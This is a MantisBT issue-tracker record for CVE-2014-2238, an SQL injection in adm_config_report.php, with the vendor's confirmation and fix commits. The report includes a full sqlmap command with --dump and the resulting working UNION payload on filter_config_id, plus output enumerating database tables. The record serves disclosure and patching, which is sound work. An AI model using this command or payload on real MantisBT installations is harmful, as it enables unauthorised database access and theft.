View Issue Details

WikiRelated ChangesetsJump to Notes
IDProjectCategoryView StatusDate SubmittedLast Update
0017055mantisbtsecuritypublic2014-02-28 11:002014-03-03 14:24
ReporterHauntIT Assigned Todregad  
PriorityimmediateSeveritymajorReproducibilityalways
Status closedResolutionfixed 
Product Version1.2.13 
Target Version1.2.17Fixed in Version1.2.17 
Summary0017055: CVE-2014-2238: SQL injection vulnerability in adm_config_report.php
Description

Jakub Galczyk from HauntIT discovered an SQL injection vulnerability in manage configuration page.

Additional Information

k@lab:~/src/sqlmap$ ./sqlmap.py -u "http://10.149.14.62//k/cms/mantis/mantisbt-1.2.16/adm_config_report.php" --data "save=1&filter_user_id=0&filter_project_id=0&filter_config_id=-2&apply_filter_button=Apply+Filter" -cookie "groupoffice=l8iqg3amg3klb0rn39u2ms19q3; p7token=2aec66601c948d5bf84eae77cc743529; itop-6e03ab144a03733e272e7756ba585991=ual3fb0vsqm9847uodsvs79472; PHPSESSID=3srq832a7cfmn6dku1ttr70tq1; utma=65758510.2100553510.1393586134.1393586134.1393586134.1; utmc=65758510;__utmz=65758510.1393586134.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); MANTIS_secure_session=1; MANTIS_STRING_COOKIE=f53b003d0014eeea9028334751d8c28bf8f23e56fe7bc77e46bbe7c857a280f4; MANTIS_PROJECT_COOKIE=1; MANTIS_MANAGE_CONFIG_COOKIE=0%3A0%3A-2; MANTIS_VIEW_ALL_COOKIE=1; MANTIS_BUG_LIST_COOKIE=1;" --dbms=mysql --dump

sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 15:19:12

[15:19:12] [INFO] testing connection to the target URL
[15:19:12] [INFO] testing if the target URL is stable. This can take a couple of seconds
you provided a HTTP Cookie header value. The target URL provided its own cookies within the HTTP Set-Cookie h
[15:19:16] [WARNING] target URL is not stable. sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison' and provide a string or regular expression to match on
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit]
[15:19:17] [INFO] testing if POST parameter 'save' is dynamic
[15:19:17] [WARNING] POST parameter 'save' does not appear dynamic
(...)
[15:20:32] [INFO] target URL appears to be UNION injectable with 6 columns
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n]
[15:22:22] [INFO] testing 'Generic UNION query (11) - 1 to 10 columns'
[15:22:25] [INFO] target URL appears to be UNION injectable with 7 columns
[15:22:32] [INFO] POST parameter 'filter_config_id' is 'Generic UNION query (11) - 1 to 10 columns' injectable
POST parameter 'filter_config_id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
(...)

[15:23:13] [WARNING] POST parameter 'apply_filter_button' is not injectable
sqlmap identified the following injection points with a total of 815 HTTP(s) requests:

Place: POST
Parameter: filter_config_id
Type: UNION query
Title: Generic UNION query (11) - 6 columns
Payload: save=1&filter_user_id=0&filter_project_id=0&filter_config_id=-4074' UNION ALL SELECT 11,CONCAT(0x716b737471,0x737a4e7050735579665a,0x71706b6d71),11,11,11,11-- &apply_filter_button=Apply Filter

[15:23:13] [INFO] testing MySQL
[15:23:14] [INFO] confirming MySQL
[15:23:14] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian
web application technology: Apache 2.2.22, PHP 5.4.4
back-end DBMS: MySQL >= 5.0.0
[15:23:14] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[15:23:14] [INFO] fetching current database
[15:23:14] [INFO] fetching tables for database: 'bugtracker'
[15:23:14] [INFO] the SQL query used returns 31 entries
[15:23:15] [INFO] retrieved: "mantis_bug_file_table"
[15:23:15] [INFO] retrieved: "mantis_bug_history_table"
[15:23:15] [INFO] retrieved: "mantis_bug_monitor_table"
[15:23:15] [INFO] retrieved: "mantis_bug_relationship_table"
[15:23:15] [INFO] retrieved: "mantis_bug_revision_table"
[15:23:15] [INFO] retrieved: "mantis_bug_table"
[15:23:16] [INFO] retrieved: "mantis_bug_tag_table"
[15:23:16] [INFO] retrieved: "mantis_bug_text_table"
[15:23:16] [INFO] retrieved: "mantis_bugnote_table"
[15:23:16] [INFO] retrieved: "mantis_bugnote_text_table"
[15:23:16] [INFO] retrieved: "mantis_category_table"
(...)

TagsNo tags attached.

Activities

dregad

dregad

2014-02-28 12:11

developer   ~0039585

Last edited: 2014-02-28 12:12

I can confirm the vulnerability, which is due to inlining query parameters instead of using db_param().

Bug was introduced in 1.2.13, by commit f8a81a33880752364ea47bdd9a987bff986c81de
dregad

dregad

2014-02-28 12:33

developer   ~0039586

sqlmap test after patching:



[*] starting at 18:32:39


[18:32:39] [INFO] testing connection to the target URL

[18:32:39] [INFO] testing if the target URL is stable. This can take a couple of seconds

[18:32:40] [WARNING] target URL is not stable. sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison' and provide a string or regular expression to match on

how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit]

[18:32:41] [INFO] skipping POST parameter 'save'

[18:32:41] [INFO] skipping POST parameter 'filter_user_id'

[18:32:41] [INFO] skipping POST parameter 'filter_project_id'

[18:32:41] [INFO] testing if POST parameter 'filter_config_id' is dynamic

[18:32:41] [INFO] confirming that POST parameter 'filter_config_id' is dynamic

[18:32:42] [INFO] POST parameter 'filter_config_id' is dynamic

[18:32:42] [WARNING] heuristic (basic) test shows that POST parameter 'filter_config_id' might not be injectable

[18:32:42] [INFO] testing for SQL injection on POST parameter 'filter_config_id'

[18:32:42] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'

[18:32:43] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'

[18:32:44] [INFO] testing 'MySQL inline queries'

[18:32:44] [WARNING] reflective value(s) found and filtering out

[18:32:44] [INFO] testing 'MySQL > 5.0.11 stacked queries'

[18:32:44] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'

[18:32:45] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'

[18:32:52] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'

[18:32:59] [WARNING] POST parameter 'filter_config_id' is not injectable

[18:32:59] [INFO] skipping POST parameter 'apply_filter_button'

[18:32:59] [CRITICAL] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp')


[*] shutting down at 18:32:59

dregad

dregad

2014-02-28 15:03

developer   ~0039587

CVE request http://thread.gmane.org/gmane.comp.security.oss.general/12241

Related Changesets

MantisBT: master-1.2.x a608f2d0

2014-02-28 07:23

dregad


Details Diff		 Fix SQL injection vulnerability in adm_config_report.php

Jakub Galczyk (HauntIT blog http://hauntit.blogspot.com/) reported this
issue, introduced by f8a81a33880752364ea47bdd9a987bff986c81de in
MantisBT 1.2.13.

Root cause is the use of unsanitized inlined query parameters.

Fixes 0017055		 Affected Issues
0017055
mod - adm_config_report.php Diff File

MantisBT: master e8bdd248

2014-02-28 07:23

dregad


Details Diff		 Fix SQL injection vulnerability in adm_config_report.php

Jakub Galczyk (HauntIT blog http://hauntit.blogspot.com/) reported this
issue, introduced by f8a81a33880752364ea47bdd9a987bff986c81de in
MantisBT 1.2.13.

Root cause is the use of unsanitized inlined query parameters.

Fixes 0017055		 Affected Issues
0017055
mod - adm_config_report.php Diff File